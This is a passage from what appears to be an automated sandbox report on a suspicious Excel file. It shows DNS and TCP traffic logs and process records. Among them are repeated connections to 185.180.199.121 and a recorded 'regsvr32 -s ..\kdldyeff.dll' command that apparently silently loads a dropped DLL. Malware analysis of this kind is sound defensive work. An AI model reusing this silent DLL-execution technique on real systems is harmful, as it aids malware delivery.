                                                                                                                                                    Jun 23, 2021 17:15:23.542834044 CEST4973580192.168.2.4185.180.199.121
                                                                                                                                                    Jun 23, 2021 17:15:26.549690962 CEST4973580192.168.2.4185.180.199.121
                                                                                                                                                    Jun 23, 2021 17:15:32.661571026 CEST4973580192.168.2.4185.180.199.121

                                                                                                                                                    UDP Packets

                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                    Jun 23, 2021 17:15:06.121184111 CEST6464653192.168.2.48.8.8.8
                                                                                                                                                    Jun 23, 2021 17:15:06.185915947 CEST53646468.8.8.8192.168.2.4
                                                                                                                                                    Jun 23, 2021 17:15:06.718322992 CEST6529853192.168.2.48.8.8.8
                                                                                                                                                    Jun 23, 2021 17:15:06.795903921 CEST53652988.8.8.8192.168.2.4
                                                                                                                                                    Jun 23, 2021 17:15:06.873821020 CEST5912353192.168.2.48.8.8.8
                                                                                                                                                    Jun 23, 2021 17:15:06.931394100 CEST53591238.8.8.8192.168.2.4
                                                                                                                                                    Jun 23, 2021 17:15:07.123950005 CEST5453153192.168.2.48.8.8.8
                                                                                                                                                    Jun 23, 2021 17:15:07.170205116 CEST53545318.8.8.8192.168.2.4
                                                                                                                                                    Jun 23, 2021 17:15:08.130825043 CEST4971453192.168.2.48.8.8.8
                                                                                                                                                    Jun 23, 2021 17:15:08.194817066 CEST53497148.8.8.8192.168.2.4
                                                                                                                                                    Jun 23, 2021 17:15:09.283163071 CEST5802853192.168.2.48.8.8.8
                                                                                                                                                    Jun 23, 2021 17:15:09.329155922 CEST53580288.8.8.8192.168.2.4
                                                                                                                                                    Jun 23, 2021 17:15:09.618675947 CEST5309753192.168.2.48.8.8.8
                                                                                                                                                    Jun 23, 2021 17:15:09.678569078 CEST53530978.8.8.8192.168.2.4
                                                                                                                                                    Jun 23, 2021 17:15:10.556751966 CEST4925753192.168.2.48.8.8.8
                                                                                                                                                    Jun 23, 2021 17:15:10.607285023 CEST53492578.8.8.8192.168.2.4
                                                                                                                                                    Jun 23, 2021 17:15:11.958971024 CEST6238953192.168.2.48.8.8.8
                                                                                                                                                    Jun 23, 2021 17:15:12.013883114 CEST53623898.8.8.8192.168.2.4
                                                                                                                                                    Jun 23, 2021 17:15:13.115807056 CEST4991053192.168.2.48.8.8.8
                                                                                                                                                    Jun 23, 2021 17:15:13.170995951 CEST53499108.8.8.8192.168.2.4
                                                                                                                                                    Jun 23, 2021 17:15:18.221193075 CEST5585453192.168.2.48.8.8.8
                                                                                                                                                    Jun 23, 2021 17:15:18.267995119 CEST53558548.8.8.8192.168.2.4
                                                                                                                                                    Jun 23, 2021 17:15:19.737098932 CEST6454953192.168.2.48.8.8.8
                                                                                                                                                    Jun 23, 2021 17:15:19.827260971 CEST53645498.8.8.8192.168.2.4
                                                                                                                                                    Jun 23, 2021 17:15:19.890693903 CEST6315353192.168.2.48.8.8.8
                                                                                                                                                    Jun 23, 2021 17:15:19.951225996 CEST53631538.8.8.8192.168.2.4
                                                                                                                                                    Jun 23, 2021 17:15:20.205254078 CEST5299153192.168.2.48.8.8.8
                                                                                                                                                    Jun 23, 2021 17:15:20.287142992 CEST53529918.8.8.8192.168.2.4
                                                                                                                                                    Jun 23, 2021 17:15:21.247226000 CEST5299153192.168.2.48.8.8.8
                                                                                                                                                    Jun 23, 2021 17:15:21.308686018 CEST53529918.8.8.8192.168.2.4
                                                                                                                                                    Jun 23, 2021 17:15:21.408472061 CEST5370053192.168.2.48.8.8.8
                                                                                                                                                    Jun 23, 2021 17:15:21.463419914 CEST53537008.8.8.8192.168.2.4
                                                                                                                                                    Jun 23, 2021 17:15:22.286027908 CEST5299153192.168.2.48.8.8.8
                                                                                                                                                    Jun 23, 2021 17:15:22.347326994 CEST53529918.8.8.8192.168.2.4
                                                                                                                                                    Jun 23, 2021 17:15:23.603409052 CEST5172653192.168.2.48.8.8.8
                                                                                                                                                    Jun 23, 2021 17:15:23.649513960 CEST53517268.8.8.8192.168.2.4
                                                                                                                                                    Jun 23, 2021 17:15:24.286133051 CEST5299153192.168.2.48.8.8.8
                                                                                                                                                    Jun 23, 2021 17:15:24.367368937 CEST53529918.8.8.8192.168.2.4
                                                                                                                                                    Jun 23, 2021 17:15:24.449513912 CEST5679453192.168.2.48.8.8.8
                                                                                                                                                    Jun 23, 2021 17:15:24.512372017 CEST53567948.8.8.8192.168.2.4
                                                                                                                                                    Jun 23, 2021 17:15:25.646636009 CEST5653453192.168.2.48.8.8.8
                                                                                                                                                    Jun 23, 2021 17:15:25.695976973 CEST53565348.8.8.8192.168.2.4
                                                                                                                                                    Jun 23, 2021 17:15:26.830100060 CEST5662753192.168.2.48.8.8.8
                                                                                                                                                    Jun 23, 2021 17:15:26.876440048 CEST53566278.8.8.8192.168.2.4
                                                                                                                                                    Jun 23, 2021 17:15:28.333570004 CEST5299153192.168.2.48.8.8.8
                                                                                                                                                    Jun 23, 2021 17:15:28.381264925 CEST53529918.8.8.8192.168.2.4
                                                                                                                                                    Jun 23, 2021 17:15:28.387031078 CEST5662153192.168.2.48.8.8.8
                                                                                                                                                    Jun 23, 2021 17:15:28.442106009 CEST53566218.8.8.8192.168.2.4
                                                                                                                                                    Jun 23, 2021 17:15:29.908272028 CEST6311653192.168.2.48.8.8.8
                                                                                                                                                    Jun 23, 2021 17:15:29.954631090 CEST53631168.8.8.8192.168.2.4
                                                                                                                                                    Jun 23, 2021 17:15:31.781655073 CEST6407853192.168.2.48.8.8.8
                                                                                                                                                    Jun 23, 2021 17:15:31.833534002 CEST53640788.8.8.8192.168.2.4
                                                                                                                                                    Jun 23, 2021 17:15:32.596698999 CEST6480153192.168.2.48.8.8.8
                                                                                                                                                    Jun 23, 2021 17:15:32.652005911 CEST53648018.8.8.8192.168.2.4
                                                                                                                                                    Jun 23, 2021 17:15:33.857270956 CEST6172153192.168.2.48.8.8.8
                                                                                                                                                    Jun 23, 2021 17:15:33.916964054 CEST53617218.8.8.8192.168.2.4
                                                                                                                                                    Jun 23, 2021 17:15:34.882993937 CEST5125553192.168.2.48.8.8.8
                                                                                                                                                    Jun 23, 2021 17:15:34.929752111 CEST53512558.8.8.8192.168.2.4
                                                                                                                                                    Jun 23, 2021 17:15:35.695528984 CEST6152253192.168.2.48.8.8.8
                                                                                                                                                    Jun 23, 2021 17:15:35.747733116 CEST53615228.8.8.8192.168.2.4
                                                                                                                                                    Jun 23, 2021 17:15:40.779616117 CEST5233753192.168.2.48.8.8.8
                                                                                                                                                    Jun 23, 2021 17:15:40.837507963 CEST53523378.8.8.8192.168.2.4
                                                                                                                                                    Jun 23, 2021 17:16:00.890558004 CEST5504653192.168.2.48.8.8.8
                                                                                                                                                    Jun 23, 2021 17:16:01.126925945 CEST53550468.8.8.8192.168.2.4
                                                                                                                                                    Jun 23, 2021 17:16:01.807156086 CEST4961253192.168.2.48.8.8.8
                                                                                                                                                    Jun 23, 2021 17:16:01.928209066 CEST4928553192.168.2.48.8.8.8
                                                                                                                                                    Jun 23, 2021 17:16:01.956259966 CEST53496128.8.8.8192.168.2.4
                                                                                                                                                    Jun 23, 2021 17:16:02.004961967 CEST53492858.8.8.8192.168.2.4
                                                                                                                                                    Jun 23, 2021 17:16:02.082015991 CEST5060153192.168.2.48.8.8.8
                                                                                                                                                    Jun 23, 2021 17:16:02.156074047 CEST53506018.8.8.8192.168.2.4
                                                                                                                                                    Jun 23, 2021 17:16:02.620239973 CEST6087553192.168.2.48.8.8.8
                                                                                                                                                    Jun 23, 2021 17:16:02.688443899 CEST53608758.8.8.8192.168.2.4
                                                                                                                                                    Jun 23, 2021 17:16:03.309227943 CEST5644853192.168.2.48.8.8.8
                                                                                                                                                    Jun 23, 2021 17:16:03.369302988 CEST53564488.8.8.8192.168.2.4
                                                                                                                                                    Jun 23, 2021 17:16:03.978740931 CEST5917253192.168.2.48.8.8.8
                                                                                                                                                    Jun 23, 2021 17:16:04.052093029 CEST53591728.8.8.8192.168.2.4
                                                                                                                                                    Jun 23, 2021 17:16:04.663188934 CEST6242053192.168.2.48.8.8.8
                                                                                                                                                    Jun 23, 2021 17:16:04.724107981 CEST53624208.8.8.8192.168.2.4
                                                                                                                                                    Jun 23, 2021 17:16:05.235652924 CEST6057953192.168.2.48.8.8.8
                                                                                                                                                    Jun 23, 2021 17:16:05.295393944 CEST53605798.8.8.8192.168.2.4
                                                                                                                                                    Jun 23, 2021 17:16:06.113240957 CEST5018353192.168.2.48.8.8.8
                                                                                                                                                    Jun 23, 2021 17:16:06.159359932 CEST53501838.8.8.8192.168.2.4
                                                                                                                                                    Jun 23, 2021 17:16:07.438272953 CEST6153153192.168.2.48.8.8.8
                                                                                                                                                    Jun 23, 2021 17:16:07.506975889 CEST53615318.8.8.8192.168.2.4
                                                                                                                                                    Jun 23, 2021 17:16:08.171327114 CEST4922853192.168.2.48.8.8.8
                                                                                                                                                    Jun 23, 2021 17:16:08.231159925 CEST53492288.8.8.8192.168.2.4
                                                                                                                                                    Jun 23, 2021 17:16:15.274323940 CEST5979453192.168.2.48.8.8.8
                                                                                                                                                    Jun 23, 2021 17:16:15.337285995 CEST53597948.8.8.8192.168.2.4
                                                                                                                                                    Jun 23, 2021 17:16:15.428447962 CEST5591653192.168.2.48.8.8.8
                                                                                                                                                    Jun 23, 2021 17:16:15.486848116 CEST53559168.8.8.8192.168.2.4
                                                                                                                                                    Jun 23, 2021 17:16:19.999152899 CEST5275253192.168.2.48.8.8.8
                                                                                                                                                    Jun 23, 2021 17:16:20.061496019 CEST53527528.8.8.8192.168.2.4
                                                                                                                                                    Jun 23, 2021 17:16:49.556658983 CEST6054253192.168.2.48.8.8.8
                                                                                                                                                    Jun 23, 2021 17:16:49.620614052 CEST53605428.8.8.8192.168.2.4
                                                                                                                                                    Jun 23, 2021 17:16:53.546560049 CEST6068953192.168.2.48.8.8.8
                                                                                                                                                    Jun 23, 2021 17:16:53.628006935 CEST53606898.8.8.8192.168.2.4

                                                                                                                                                    Code Manipulations

                                                                                                                                                    Statistics

                                                                                                                                                    Behavior

                                                                                                                                                    Click to jump to process

                                                                                                                                                    System Behavior

                                                                                                                                                    General

                                                                                                                                                    Start time:17:16:17
                                                                                                                                                    Start date:23/06/2021
                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                    Imagebase:0x9f0000
                                                                                                                                                    File size:27110184 bytes
                                                                                                                                                    MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    General

                                                                                                                                                    Start time:17:16:43
                                                                                                                                                    Start date:23/06/2021
                                                                                                                                                    Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:regsvr32 -s ..\kdldyeff.dll
                                                                                                                                                    Imagebase:0x9d0000
                                                                                                                                                    File size:20992 bytes
                                                                                                                                                    MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    Disassembly

                                                                                                                                                    Code Analysis

                                                                                                                                                    Reset < >